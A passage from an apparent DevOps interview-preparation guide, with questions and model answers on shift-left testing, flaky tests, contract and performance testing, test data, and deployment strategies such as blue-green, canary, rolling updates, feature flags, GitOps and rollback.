eval()usage. But SAST tools have vulnerability databases, understand attack patterns (taint analysis — tracking untrusted user input through code paths), and can identify complex vulnerabilities like SQL injection chains across multiple function calls. Semgrep bridges both worlds with security-focused and quality-focused rulesets. - “Should static analysis block the pipeline or just warn?” Block on: critical security vulnerabilities, type errors, formatting violations (these are auto-fixable, no excuse). Warn on: code complexity, minor style preferences, informational findings. The key: if a finding is always ignored, it shouldn’t be in the pipeline — it creates alert fatigue. If a finding is always critical, it should block. Review your warning-to-action ratio quarterly and adjust thresholds.
16. Shift Left Testing
16. Shift Left Testing
- Pre-commit hooks: Run linters, formatters, and basic tests before code even leaves the developer’s machine. Using Husky (JS) or pre-commit (Python). A developer catches a formatting error in 2 seconds instead of a CI pipeline failing 5 minutes later.
- IDE integration: SonarLint, ESLint IDE plugins, TypeScript in-editor type checking. Developers see issues as they type, not after they push.
- SAST in PR reviews: Security scans run on every PR, not just before release. CodeQL, Semgrep, Snyk. Developers learn secure coding patterns through feedback on their own code.
- Developer-written integration tests: Instead of “throw it over the wall to QA,” developers write integration tests for their own features using Testcontainers (real databases in Docker) as part of the PR.
- Threat modeling during design: Security review happens at the design doc phase, not after implementation. “This endpoint accepts user-uploaded files — have we considered path traversal, file size limits, and malware scanning?”
- Trunk-based development: Short-lived branches (hours, not weeks) means integration happens continuously, not in a painful “merge week.”
- “How do you measure if shift-left is working?” Track: defect escape rate (bugs found in production vs. total bugs found), mean time to detect (from code commit to bug discovery), and where in the pipeline bugs are caught (ideally 80%+ in unit/integration tests, not E2E or production). If defect escape rate drops from 30% to 10% over 6 months, shift-left is working. Also track developer satisfaction — if developers hate the pre-commit hooks because they take 30 seconds, you’ve shifted left but created friction.
-
“What’s the risk of over-shifting left?”
Developer friction. If pre-commit hooks run 10 different tools and take 2 minutes, developers will use
--no-verifyto skip them. If every PR requires 15 checks to pass, developers batch changes into fewer, larger PRs (the opposite of what CI wants). The goal is fast, valuable checks locally and thorough checks in CI. Don’t make the developer’s machine do CI’s job. -
“How do you shift left on security without security expertise on every team?”
Provide guardrails, not gates. Use automated SAST tools with clear, actionable findings (“This SQL query is vulnerable to injection — use parameterized queries instead”). Create security-approved libraries and patterns (a team-provided
SafeQuerywrapper). Run security champions programs (one engineer per team gets basic security training and becomes the team’s security point of contact). Use policy-as-code (OPA, Kyverno) to enforce security rules automatically.
17. Flaky Tests
17. Flaky Tests
- Timing / Race conditions: Test assumes operation X completes before assertion. Works on fast CI runners, fails on slow ones. Fix: Use explicit waits (
waitFor,Eventually) instead ofsleep. Poll for state changes rather than assuming timing. - Shared state: Tests share a database, file system, or in-memory state. Test A writes data, Test B reads it. Works when run sequentially, fails in parallel. Fix: Each test creates its own state and cleans up (or uses transactions that rollback). Use unique test IDs for data isolation.
- External dependencies: Test calls a real API (Stripe sandbox, OAuth provider). The API is slow or down. Fix: Mock external services. Use WireMock, VCR, or recorded fixtures for HTTP interactions.
- Non-determinism: Tests depend on current time, random numbers, or dictionary/map ordering. Fix: Inject time providers, seed random generators, sort before comparing.
- Resource leaks: Test opens connections or file handles without closing them. Works in isolation, fails when the test suite runs 500 tests and exhausts the connection pool. Fix: Use
afterEachcleanup. Monitor resource usage in test suites. - Test pollution from environment: Different OS line endings, timezone differences, locale-specific formatting. Fix: Explicitly set locale and timezone in test setup. Use
Date.UTCinstead of local dates.
- “How do you systematically reduce flakiness across a large test suite?” Measure: Tag every test run, track pass/fail history per test, compute a flake rate. Quarantine: Move tests with > 5% flake rate to a non-blocking suite. Prioritize: Fix the most-run, most-flaky tests first (highest impact). Track: Dashboard showing flake rate over time, create a target (e.g., < 1% flake rate within 3 months). Some teams have a weekly “flake rotation” where one engineer spends a day fixing the top 5 flaky tests.
- “Is it ever correct to retry a failing test?” Yes, for infrastructure flakiness you can’t control (CI runner network blip, Docker daemon hiccup). But implement it with tracking: if a test passes on retry, log it as a flake and increment a counter. If the counter exceeds a threshold, auto-file a ticket. The retry is a bandage, not a fix. Also, retry at the test level (re-run the specific test), not the pipeline level (re-run everything).
- “How do you prevent new flaky tests from being introduced?” Run each new test N times (e.g., 10) in CI before merging. If it fails any run, it’s flagged as potentially flaky. Some teams use a “quarantine-on-merge” approach: new tests run in a monitored-but-non-blocking mode for their first week. If they flake during that period, they’re automatically quarantined and the author is notified. This catches flakiness before it impacts the team.
18. Contract Testing (Pact)
18. Contract Testing (Pact)
- E2E tests across services: Require all services running simultaneously. Slow, flaky, expensive. 20 services = 20 services to deploy for every test run.
- Mocking Service B in Service A’s tests: The mock can drift from reality. Service B changes its response format, but Service A’s mock still returns the old format. Tests pass, production breaks.
- Consumer side: Service A (consumer) writes a “pact” — a contract describing what it expects from Service B. “When I send
GET /users/123, I expect a JSON response withid(number),name(string), andemail(string).” This generates a contract file (JSON). - Provider side: Service B (provider) runs the contract against its actual implementation. “Can I satisfy what Service A expects?” If Service B returns
usernameinstead ofname, the contract test fails. - Pact Broker: A central server that stores contracts and verification results. Provides a “can I deploy?” check: “Have all consumers’ contracts been verified against this version of the provider?”
- Service A team writes contract tests in their repo (consumer side).
- Contract is published to Pact Broker.
- Service B’s CI pipeline pulls consumer contracts and verifies them against Service B’s latest code.
- If verification fails, Service B knows their change would break Service A.
- Service B team either fixes the incompatibility or coordinates a migration with Service A.
-
“How does contract testing interact with API versioning?”
Contract tests work alongside versioning. If Service B introduces
/v2/userswith a breaking change, old consumers still have contracts against/v1/users. The provider verifies it can satisfy both v1 and v2 contracts simultaneously. When all consumers have migrated to v2, v1 contracts are removed and v1 can be decommissioned safely. Pact Broker tracks which consumer versions use which contract versions. - “What’s the difference between contract testing and schema validation (like OpenAPI)?” OpenAPI validates that a response matches a schema structure. Contract testing validates that a response matches what a specific consumer actually needs. OpenAPI says “the response CAN have 50 fields.” Contract testing says “Service A NEEDS fields X, Y, Z.” This is a crucial difference — schema validation doesn’t catch breaking changes to fields that consumers depend on but the schema considers optional.
- “When does contract testing not work well?” Event-driven architectures where the contract is a message schema — Pact supports this but the tooling is less mature than HTTP contracts. Also, when you have hundreds of microservices with complex dependency chains — the contract verification matrix becomes large. And for public APIs with unknown consumers — you can’t write consumer contracts for consumers you don’t know about. For public APIs, use OpenAPI + backward compatibility checks instead.
19. Performance Testing
19. Performance Testing
- Load Testing: Simulate expected production traffic. “Our app serves 10,000 concurrent users. Does response time stay under 200ms at this load?” Run before major releases and after significant architecture changes. Tools: K6, Locust, Gatling.
- Stress Testing: Push beyond expected limits to find the breaking point. “At what load does latency exceed 1 second? At what point do errors spike above 1%?” Reveals: thread pool exhaustion, connection pool limits, memory pressure. The goal isn’t to pass — it’s to find the ceiling and understand degradation behavior (does it degrade gracefully or fall off a cliff?).
- Soak Testing (Endurance): Run normal load for extended periods (8-24 hours). Catches: memory leaks (heap grows 10MB/hour — fine for 1 hour, OOM after 12), connection pool leaks, log file disk exhaustion, certificate expiration, GC pressure accumulation. This is how Netflix found a memory leak in their Java services that only manifested after 16 hours of steady traffic.
- Spike Testing: Sudden traffic burst (Black Friday, breaking news, product launch). “Traffic goes from 1,000 to 50,000 RPS in 30 seconds. Does auto-scaling react fast enough? Do requests queue up or error?” Tests: auto-scaling trigger time, cold start performance, connection establishment rate.
- Baseline/Regression Testing: Run the same load test on every deploy, compare metrics against the previous version. “Did this PR add 15ms to the p99 latency?” Automated in CI with K6 + a threshold check. If p99 exceeds baseline by 10%, the pipeline fails.
- Response time: p50 (median), p95, p99 (tail latency). p99 matters most — it’s what 1 in 100 users experience.
- Throughput: Requests per second (RPS).
- Error rate: % of 5xx responses under load.
- Resource utilization: CPU, memory, network I/O, disk I/O during the test.
- Saturation: Queue depths, thread pool usage, connection pool utilization.
- “How do you integrate performance tests into CI/CD without slowing down the pipeline?” Run lightweight performance regression tests (30-second K6 script hitting 5 key endpoints at moderate load) in the staging deploy pipeline. Compare p95 and error rate against the last successful run. If regression exceeds threshold, fail the pipeline. Save full load tests (30-minute, production-scale) for a nightly or weekly scheduled pipeline. The CI test catches regressions, the scheduled test validates capacity.
- “Your p99 latency spiked from 200ms to 800ms after a deploy. How do you investigate?” Compare the two versions. Check: did a new database query get added? (slow query log). Did serialization change? (larger payloads). Did connection pooling change? (pool exhaustion under load). Use distributed tracing (Jaeger, Datadog APM) to find which span increased. Check garbage collection logs (GC pauses can spike p99 while p50 stays flat). Profile the hot path under load (async profiler for JVM, pprof for Go).
- “How do you generate realistic load for performance tests?” Capture production traffic patterns (not just volume, but the mix of endpoints, request sizes, and user behavior). K6 can replay HAR files. Locust models user behavior as Python classes. The worst performance tests use a single endpoint with a single request size — real traffic has a distribution. Model: 60% reads, 20% writes, 15% searches, 5% file uploads. Include authentication, session handling, and realistic think times between requests.
20. Test Data Management
20. Test Data Management
- Never use production data directly. Production data contains PII (names, emails, addresses, payment info). Using it in test environments violates GDPR, HIPAA, PCI-DSS, and basic engineering ethics. One company copied their production database to staging, and a developer took a screenshot of test results that included real customer emails — GDPR violation, 2% of annual revenue fine.
- Anonymization/Masking: If production data structure is needed, anonymize it. Replace real names with fake ones (Faker library), hash emails, randomize addresses, mask credit card numbers. Tools: Tonic, Delphix, AWS DMS with transformation. The challenge: maintaining referential integrity (User A’s orders must still belong to User A’s anonymized record).
- Synthetic Data Generation: Create data from scratch using Faker, Factory Bot (Ruby), Fishery (TS), or custom seed scripts. Pros: fully controlled, reproducible, no privacy concerns. Cons: might miss edge cases that exist in real data (Unicode names, addresses with special characters, orders with 500 line items).
- Test data reset: Every test run should start from a known state. Approaches: database seeding before test suite, per-test transactions that rollback (
@Transactionalin Spring), Testcontainers (ephemeral database per test suite), database snapshots restored between runs. - Referential test data: For integration tests, you need related data. A test for “add item to cart” needs a user, a product, and a cart. Use test data factories/builders that create the full dependency graph:
createOrder()automatically creates a user, product, and cart entry.
- “How do you handle test data for microservices that share data across services?” Each service owns its test data. If Service A needs data from Service B, Service A mocks Service B’s response (unit/integration tests) or uses contract testing. For E2E environments, use a test data orchestrator that seeds all services’ databases with a consistent, related dataset. Some teams use a “test data service” that provides an API to create and tear down cross-service test scenarios.
-
“How do you keep test data in sync as the schema evolves?”
Test data factories and seed scripts must be updated alongside schema migrations. If a migration adds a
phone_numbercolumn tousers, the test data factory must generate phone numbers. Treat test data code as production code — it lives in the repo, has tests, and is reviewed in PRs. Some teams auto-generate factories from the ORM schema so they stay in sync automatically. -
“What about performance test data?”
Performance tests need volume. You can’t manually create 10 million rows. Use bulk generation scripts that create data matching production’s distribution (e.g., 80% of users have 1-5 orders, 15% have 6-50, 5% have 50+). Store the seed as a database dump or a migration that can be applied to test environments. Be careful with indexed data — inserting 10M rows sequentially is slow; use
COPY(Postgres) orLOAD DATA INFILE(MySQL) for bulk inserts.
3. Deployment Patterns
21. Blue Green Deployment
21. Blue Green Deployment
- Blue (active): Currently serving all production traffic.
- Green (idle): Deploy the new version to Green. Run smoke tests and health checks against Green (no live traffic yet).
- Switch: Update the load balancer / DNS / Kubernetes service to point traffic from Blue to Green. This switch is near-instant.
- Rollback: If Green has issues, switch the load balancer back to Blue. Rollback time: seconds (just a routing change, not a new deployment).
- Cleanup: Once Green is verified stable, Blue becomes the idle environment for the next deployment.
- Cost: You’re running 2x infrastructure permanently. For a service running on 20
m5.xlargeinstances, that’s ~$5,000/month extra (AWS on-demand). At scale across 50 services, this adds up. Mitigation: scale Green to minimum during idle periods, scale up before deployment. - Database migrations: Both Blue and Green point to the same database. If the new version changes the schema, Blue (old code) must still work with the new schema during the transition period. This requires backward-compatible migrations (add columns before removing old ones, never rename in-place). This constraint is the #1 source of blue-green deployment failures.
- Long-running connections: WebSocket connections, gRPC streams, and long-polling requests on Blue don’t automatically switch to Green. You need graceful connection draining — stop sending new connections to Blue while letting existing ones finish (with a timeout).
- Session state: If sessions are stored in-memory on Blue, switching to Green loses all sessions. Sessions must be externalized (Redis, database) for blue-green to work.
- “How do you handle database migrations in blue-green?” Use the expand-and-contract pattern. Step 1 (expand): Add the new column alongside the old one. Deploy code that writes to both columns. Step 2 (migrate data): Backfill the new column from the old one. Step 3 (contract): Once all traffic is on Green (which reads from the new column), remove the old column in a subsequent deploy. This spans multiple deployments. A single deploy that renames a column will break Blue immediately.
- “Blue-green vs canary — when do you choose each?” Blue-green when you need instant, complete rollback and can afford 2x resources. Good for critical services where partial rollout doesn’t provide enough confidence (e.g., a database proxy — you don’t want some queries going to v1 and others to v2). Canary when you want to validate with real traffic gradually and limit blast radius. Good for user-facing services where 5% of users seeing a bug is acceptable for validation purposes. Most mature teams use canary for routine deploys and blue-green for high-risk changes.
- “How do you verify Green before switching traffic?” Run automated smoke tests against the Green environment’s internal endpoint (not exposed to users yet). Verify health checks, database connectivity, downstream service connectivity. Some teams send a copy of production traffic to Green (shadow traffic) and compare responses. If Green has an error rate > 0.1% on shadow traffic, abort the switch. This is more thorough than smoke tests because it tests real traffic patterns.
22. Canary Deployment
22. Canary Deployment
- Deploy new version alongside old. Route 1% of traffic to canary.
- Monitor for 5-10 minutes. Check error rate, latency (p50, p95, p99), CPU/memory, business metrics (conversion rate, API success rate).
- If metrics are healthy, increase to 5%, then 10%, 25%, 50%, 100%.
- If any step shows regression, automatically rollback to 0% canary traffic.
- Kayenta (Netflix/Spinnaker): Statistical canary analysis. Compares canary metrics against baseline (old version) metrics using Mann-Whitney U test. Produces a score from 0-100. Score < 50 = fail = auto-rollback. Score > 70 = pass = promote.
- Argo Rollouts (Kubernetes): Defines canary steps in a
Rolloutresource. Integrates with Prometheus for automated analysis. Failed analysis triggers rollback. - Flagger (Kubernetes): Similar to Argo Rollouts, works with Istio, Linkerd, or App Mesh for traffic shifting.
- Golden signals: Latency, error rate, traffic volume, saturation (CPU/memory).
- Business metrics: Conversion rate, cart abandonment rate, API call success rate. A canary might have perfect error rates but cause a 5% drop in conversions because a UX change confused users.
- Downstream impact: Does the canary version increase error rates in services it calls? A canary might look healthy while degrading a downstream database.
- “How do you handle canary for stateful operations (e.g., writes to a database)?” This is the hardest part. If canary version v2 writes data in a new format, and you rollback to v1, can v1 read v2’s data? The answer must be yes — forward and backward compatibility. Some teams use a “canary database” for writes (separate database or table partition) and merge the data after promotion. More commonly, the data format is kept backward-compatible so both versions can coexist. For critical writes (financial transactions), some teams make canary read-only and only enable writes after full promotion.
- “Your canary shows a 0.5% error rate increase. The baseline is 2%. Is that significant?” It depends on sample size and normal variance. With 1,000 requests to canary, a 0.5% increase means 5 additional errors — this could be statistical noise. With 100,000 requests, it’s 500 additional errors — significant. Use statistical significance testing (chi-squared test for proportions, or Kayenta’s built-in analysis). Also check: are the errors affecting all users or just a specific segment? Is the error rate stable at 2.5% or climbing? A stable 2.5% might be a known issue; a climbing rate signals a progressive failure.
- “How long should a canary bake before promotion?” Long enough to capture the full traffic pattern. If your app has daily traffic cycles (high during business hours, low at night), the canary should bake through at least one full cycle (24 hours) before full promotion. For traffic-pattern-insensitive services, 15-30 minutes at each step with statistical analysis is usually sufficient. For critical services, some teams bake for 72 hours at 5% before promoting to 50%. The more critical the service, the longer the bake.
23. Rolling Update
23. Rolling Update
maxSurge: 25%— allow 25% more pods than desired count during update (4 desired = up to 5 during rollout).maxUnavailable: 25%— allow 25% of pods to be unavailable during update (4 desired = at least 3 running).- Kubernetes creates new pods (v2), waits for them to pass readiness probes, then terminates old pods (v1). This continues until all pods are v2.
- API changes must be backward-compatible during rollout. Add new fields, don’t remove or rename old ones until the rollout is complete and only v2 is running.
- Database migrations must work with both v1 and v2 code simultaneously.
- Frontend clients that cache the old JavaScript bundle might send requests to v2 backend with v1 assumptions. Use API versioning or graceful degradation.
-
“How do you set maxSurge and maxUnavailable for a latency-sensitive service?”
For a latency-sensitive service, you want zero capacity reduction during the rollout (every request must have a healthy pod to serve it). Set
maxUnavailable: 0(never reduce capacity below desired count) andmaxSurge: 25-50%(bring up new pods before terminating old ones). This uses more resources during the rollout but ensures no request capacity is lost. For non-critical batch services, you can usemaxUnavailable: 50%to speed up the rollout. -
“Your rolling update is stuck — pods keep failing readiness probes. What do you do?”
kubectl rollout statusshows it’s stuck.kubectl get podsshows new pods in CrashLoopBackOff or not-ready state. Check pod logs (kubectl logs), describe the pod for events (kubectl describe pod), check readiness probe configuration (wrong port? wrong path? too aggressive timeout?). If it’s a code bug:kubectl rollout undo deployment/myappto revert to the previous ReplicaSet. Check the deployment’sprogressDeadlineSeconds— if set, Kubernetes will automatically mark the rollout as failed after the deadline. - “How does Kubernetes ensure zero downtime during a rolling update?” Three mechanisms: readiness probes (new pods only receive traffic once they report ready), preStop hooks (old pods get a grace period to finish in-flight requests before termination), and SIGTERM handling (the app catches SIGTERM and stops accepting new connections while completing existing ones). If any of these three are missing, you’ll see brief error spikes during rollouts. The most commonly missed: preStop hook with a small sleep to allow the load balancer to deregister the pod before it starts shutting down.
24. Feature Toggles (Flags)
24. Feature Toggles (Flags)
if (featureFlags.isEnabled('new-checkout')) and control visibility independently of deployments.Types of feature flags:- Release flags: “Is this feature ready for users?” Boolean, temporary. Remove after the feature is fully launched. Lifespan: days to weeks.
- Experiment flags: “Which version performs better?” A/B testing. Route 50% to variant A, 50% to B. Measure conversion. Lifespan: weeks.
- Ops flags: “Is this system healthy?” Kill switches.
if (flags.isEnabled('enable-payment-processing')). Used to disable problematic features without deploying. Lifespan: permanent (but rarely toggled). - Permission flags: “Does this user have access?” Per-user or per-segment targeting. “Enable feature X for beta users.” Lifespan: varies.
on and off states. Stale flags (feature launched 6 months ago, flag still in code) are tech debt. They confuse new developers (“Should I test with this on or off?”), increase cyclomatic complexity, and create dead code paths.Mitigation: Set expiration dates on flags. Auto-create tickets to remove flags after launch. Track flag age in a dashboard. Some teams have a policy: if a release flag is older than 30 days and is on for 100% of users, it must be removed in the next sprint.Red flag answer: “We use feature flags for everything and never remove them.” This is a recipe for unmaintainable code. Also: “Feature flags are just if statements.” This misses the targeting, metrics, and operational aspects.Follow-up:-
“How do you test code behind feature flags?”
Test both paths. Unit tests should run with flag on AND flag off. CI matrix:
FEATURE_NEW_CHECKOUT=trueandFEATURE_NEW_CHECKOUT=false. For complex flag combinations, use combinatorial testing (not every combination, but critical paths with each flag in each state). LaunchDarkly provides a “test” SDK that lets you set flag values deterministically in tests without calling the real service. -
“A feature flag is controlling a critical path. How do you manage the risk?”
The flag evaluation itself is a point of failure. What happens if the flag service is unreachable? Always define a default value (
isEnabled('feature', default=false)). Use local caching with a fallback — the SDK caches the last known flag state and serves it if the flag service is down. For critical ops flags (kill switches), consider storing them in a local config file that can be updated without the flag service, as a belt-and-suspenders approach. -
“How do you handle database schema changes behind a feature flag?”
This is tricky because the database doesn’t have an
ifstatement. Deploy the schema change (add new columns) without the flag — the schema is always “expanded.” The flag controls which code path reads/writes the data. Old path: reads from old columns. New path: reads from new columns. When the flag is fully on and the old path is removed, you can contract the schema (remove old columns) in a subsequent migration. This is the expand-contract pattern applied to feature flags.
25. Shadow Deployment (Dark Launch)
25. Shadow Deployment (Dark Launch)
- Production traffic hits the load balancer.
- The load balancer or a service mesh (Istio) duplicates each request.
- Original goes to v1 (production) and returns the response to the user.
- Copy goes to v2 (shadow) and the response is logged but discarded.
- Compare v1 and v2 responses asynchronously: latency differences, response body differences, error rate differences.
- Major rewrites: Replacing a payment service written in Ruby with one in Go. Shadow both, compare results for weeks before cutting over. Any discrepancy in responses = a bug to fix.
- ML model deployment: New recommendation model runs in shadow. Compare recommendations against the existing model. Measure click-through rate prediction accuracy before serving to users.
- Database migration: New database (Postgres to DynamoDB). Shadow reads go to both. Compare query results. Any difference = a migration bug.
- Side effects: If the shadow request writes to a database, sends an email, or charges a credit card, you’ve just doubled those actions. Shadow traffic must be filtered to remove or mock all write operations. This is the #1 mistake — someone shadows a
POST /ordersendpoint and creates duplicate orders. - Load: Shadow traffic doubles the load on downstream services. If the shadow service calls a third-party API, you’re doubling your API calls (and possibly your bill). Use circuit breakers or sampling (shadow 10% instead of 100%).
- Async processing: If the shadow request triggers background jobs (send email, process webhook), you need to suppress those in the shadow path.
-
“How do you handle shadow deployments for write operations?”
Option 1: Shadow only read endpoints (
GETrequests). This covers many comparison scenarios. Option 2: For write operations, the shadow version writes to a separate database/namespace (a “shadow database”). Compare the resulting state periodically. Option 3: Mock all external side effects in the shadow path (intercept HTTP calls, queue writes to a dead-letter queue for analysis instead of executing them). The key principle: shadow traffic must never produce user-visible side effects. - “How do you compare v1 and v2 responses at scale?” Log both responses with a correlation ID (request ID). A comparison pipeline (Kafka consumer, batch job) reads both responses and diffs them. Ignore expected differences (timestamps, UUIDs) and flag unexpected ones. At GitHub, when they rewrote their permissions system, they shadowed every permission check for months, comparing old and new results. Any discrepancy was a bug. Tools: Diffy (Twitter’s open-source response diffing proxy), custom Kafka consumers.
- “What’s the difference between shadow deployment and canary deployment?” Canary serves real responses to a small percentage of users — users are affected by bugs. Shadow never serves responses to users — it’s purely for validation. Canary is useful when you need to validate real user behavior (A/B metrics, conversion rates). Shadow is useful when you need to validate correctness without any user risk. A mature deployment strategy might use shadow first (validate correctness), then canary (validate user impact), then full rollout.
26. GitOps (ArgoCD)
26. GitOps (ArgoCD)
- Declarative: The entire system state is described declaratively (Kubernetes manifests, Helm charts, Kustomize overlays).
- Versioned and immutable: All changes go through Git. Pull requests, code review, audit trail. No
kubectl applyfrom a developer’s laptop. - Pulled automatically: The cluster agent (ArgoCD, Flux) polls the Git repo and applies changes. This is pull-based (cluster pulls state from Git) vs push-based (CI pushes to cluster). Pull-based is more secure because the cluster doesn’t need to expose its API externally.
- Continuously reconciled: If someone manually changes a resource in the cluster (
kubectl edit), the GitOps controller detects the drift and reverts it to match Git. This prevents configuration drift and enforces Git as the source of truth.
- Application CRD: Defines source (Git repo, path, branch), destination (cluster, namespace), and sync policy.
- Sync status:
Synced(Git matches cluster),OutOfSync(Git and cluster differ),Unknown(can’t determine). - Auto-sync vs manual sync: Auto-sync automatically applies changes when Git changes. Manual sync requires a human to click “Sync” in the UI or CLI. For production, many teams use auto-sync for non-critical services and manual sync for critical ones.
- Sync waves: Control the order of resource application. Wave 0 = namespaces, Wave 1 = secrets, Wave 2 = deployments. Ensures dependencies are created first.
- App of Apps pattern: A parent ArgoCD Application manages child Applications. One repo defines all applications in the cluster. Adding a new service = adding one YAML file to Git.
- “How do you handle secrets in GitOps if everything must be in Git?” Secrets can’t be stored in plain text in Git. Options: Sealed Secrets (encrypt secrets client-side, store encrypted YAML in Git, controller decrypts in cluster), External Secrets Operator (syncs secrets from Vault/AWS Secrets Manager into Kubernetes Secrets — Git references the external secret, not the value), SOPS (Mozilla’s Secrets OPerationS — encrypts specific values in YAML files using KMS keys). The pattern: Git stores a reference or encrypted version of the secret, never the plaintext.
- “What’s the difference between ArgoCD and Flux?” Both implement GitOps. ArgoCD has a rich UI, multi-tenancy support, RBAC, and the App of Apps pattern. Flux is more lightweight, Kubernetes-native (CRDs only, no UI by default), and integrates tightly with the Kubernetes ecosystem (Kustomize, Helm controllers as separate components). ArgoCD is better for organizations that need a dashboard and fine-grained access control. Flux is better for teams that prefer pure CLI/GitOps workflows. Both are CNCF graduated projects.
-
“Someone runs
kubectl edit deploymentin production. What happens in a GitOps setup?” ArgoCD detects the drift within its polling interval (default: 3 minutes) and marks the Application asOutOfSync. If auto-sync is enabled, it reverts the change to match Git. If manual sync, it alerts the team that drift was detected. This is exactly the behavior you want — it enforces that all changes go through Git. To make the change stick, the engineer must commit it to Git, get it reviewed, and let ArgoCD apply it. Some teams disablekubectl editaccess entirely via RBAC to prevent this scenario.
27. Recreate Strategy
27. Recreate Strategy
- Backward-incompatible schema migrations: The new database schema can’t coexist with old code. Running both versions simultaneously (as in rolling update) would cause errors. You must stop all old code, run the migration, then start new code.
- Singleton applications: Only one instance should run at a time (e.g., a Kubernetes operator, a job scheduler, a leader-election-based service). Running two instances causes conflicts (duplicate cron jobs, double-processed events).
- Shared volume access: The application uses a ReadWriteOnce persistent volume. Only one pod can mount it at a time. Rolling update would fail because the new pod can’t mount the volume while the old pod still has it.
- License constraints: Some commercial software licenses limit concurrent instances.
- Stateful applications with incompatible state: A cache or in-memory store that can’t be shared across versions.
-
“How do you minimize downtime with recreate strategy?”
Pre-pull images on all nodes before the deploy (DaemonSet that pulls the image). Reduce graceful termination period (
terminationGracePeriodSeconds) to the minimum safe value. Use init containers for heavy startup tasks (database connection warming) so the main container starts faster. Configure aggressive readiness probes (check every 1 second instead of 10). For the ultimate optimization: pre-warm a complete new set of pods, then atomically swap (which is basically blue-green). -
“How do you communicate planned downtime to users?”
Maintenance page served by a static server or CDN (not by the app being restarted). Schedule during lowest-traffic window (analytics will show this — often 2-4 AM local time). Notify users via email/status page 24 hours in advance. Use a status page (Statuspage.io, Instatus) that updates automatically when the deploy starts and completes. For API consumers, return
503 Service Unavailablewith aRetry-Afterheader. - “If you need to do a backward-incompatible migration, can you avoid downtime?” Yes, with more engineering effort. Use the expand-and-contract pattern across multiple deploys. Deploy 1: add new columns/tables (expand). Deploy 2: backfill data, write to both old and new. Deploy 3: switch reads to new, still write to both. Deploy 4: remove old columns/tables (contract). Each deploy is independently backward-compatible. Total effort: 4 deploys over days vs. 1 deploy with 5 minutes of downtime. The choice depends on your SLA requirements and traffic patterns.
28. Rollback Strategy
28. Rollback Strategy
- Kubernetes:
kubectl rollout undo deployment/myappreverts to the previous ReplicaSet. Takes seconds. Works because Kubernetes retains previous ReplicaSet configs. - Docker/Containers: Deploy the previous image tag. Since artifacts are immutable and tagged with git SHA,
myapp:abc1234is always the same binary. - ArgoCD: Revert the Git commit. ArgoCD detects the change and deploys the previous version. Or use ArgoCD’s “rollback” feature to sync to a previous Git revision.
SELECT *, probably not — if using explicit column lists, probably yes). But if the migration dropped a column or changed a data type, the old code is broken.Strategies:- Forward-only migrations: Never rollback the database. If the new code is bad, fix forward (deploy a new version with the fix). This requires fast pipeline speed (< 15 minutes from commit to production).
- Paired rollback migrations: Every migration has a corresponding “down” migration. Tools like Flyway and Liquibase support this. Danger: down migrations can lose data (you can’t un-drop a column if the data is gone).
- Backward-compatible migrations only: Design every migration so both old and new code work. Never remove or rename columns in the same release that changes code expectations. This is the gold standard but requires discipline.
- Error rate exceeds 2x baseline for 2 minutes.
- p99 latency exceeds 3x baseline for 5 minutes.
- Health check failures on > 50% of new pods.
- Kubernetes:
progressDeadlineSecondsin Deployment spec. - ArgoCD:
AnalysisRunwith Prometheus queries.
kubectl rollout undo.” No mention of database state, data consistency, or automated triggers. Rollback is a system problem, not just a Kubernetes command.Follow-up:- “A rollback succeeded but users are still seeing errors. Why?” Possible causes: CDN/browser cache is serving old frontend assets that call new (now rolled-back) API endpoints. DNS TTL hasn’t expired (still routing to the new version in some regions). Database was migrated and old code can’t work with the new schema. Downstream services cached data from the new version. Kafka consumers processed messages from the new version and the resulting state is incompatible. Rollback doesn’t undo side effects.
- “How do you handle rollback when multiple services deploy together?” Avoid coupled deployments. Each service should be independently deployable and rollbackable. If Service A v2 depends on Service B v2, you have a coordination problem. Solutions: deploy Service B v2 first (backward-compatible API), verify it, then deploy Service A v2. If A needs rollback, B’s v2 API still works for A’s v1 (backward-compatible). If this isn’t possible, use a feature flag: deploy both, enable the feature flag to activate the new interaction, disable the flag to “rollback” without redeploying.
- “What’s your opinion on ‘always fix forward’ vs ‘always rollback’?” Both have merits. Fix forward works when: your pipeline is fast (< 15 min), the issue is well-understood, and you have the engineering capacity to fix quickly. Rollback works when: the issue is unclear, the blast radius is large, or the fix will take hours. My default: rollback first (stop the bleeding), investigate, then fix forward. Time to recovery (MTTR) is the metric that matters, and rollback usually gets you there fastest. The teams that struggle most are those that have neither — they can’t rollback (no artifact versioning) and can’t fix forward (slow pipeline).
29. A/B Testing
29. A/B Testing
- Assignment: A hashing function assigns users to groups deterministically.
hash(user_id + experiment_name) % 100— values 0-49 get variant A, 50-99 get variant B. This ensures a user always sees the same variant (no flickering) and assignment is balanced. - Exposure: The application checks the user’s group and renders the appropriate variant. Feature flags (LaunchDarkly, Optimizely, GrowthBook) handle this.
- Measurement: Track the target metric (conversion rate, click-through rate, revenue per user) for each group over a sufficient duration.
- Analysis: Use statistical tests (chi-squared for proportions, t-test for continuous metrics) to determine if the difference is statistically significant (p < 0.05) and practically significant (the effect size is large enough to matter).
- Sample size: You need enough users in each group for the result to be statistically meaningful. A 1% conversion rate difference requires ~16,000 users per group to detect (at 80% power). Running an A/B test on 100 users proves nothing.
- Duration: Run for at least 1-2 full business cycles (2 weeks minimum) to account for day-of-week effects. Stopping an experiment early because “it looks like a winner” is a statistical error called “peeking.”
- Multiple comparisons: Testing 10 variants simultaneously means a 40% chance of at least one false positive (at p < 0.05). Use Bonferroni correction or sequential testing.
- Network effects: If variant A users interact with variant B users (social features, marketplace), contamination biases the results. Use cluster randomization (randomize by region or social graph cluster).
- “How does A/B testing differ from canary deployment?” Canary is a deployment safety mechanism — “does the new code work correctly?” Metric: error rate, latency. A/B testing is a product experiment — “does the new feature perform better?” Metric: conversion, revenue, engagement. A canary runs for hours. An A/B test runs for weeks. A canary rolls out to 100% when validated. An A/B test might result in choosing the old version. They can coexist: canary validates code safety, then A/B validates product impact.
- “The A/B test shows variant B has 3% higher conversion. The PM wants to ship it. What questions do you ask?” Is the result statistically significant (p < 0.05)? What’s the confidence interval (if it’s 3% +/- 4%, the true effect could be negative)? Was the test run for a full business cycle? Are there segment differences (B might be better overall but worse for mobile users)? Is there a novelty effect (users engage more because it’s new, not because it’s better — needs a holdout group after launch)? What’s the impact on secondary metrics (conversion up but customer support tickets also up)?
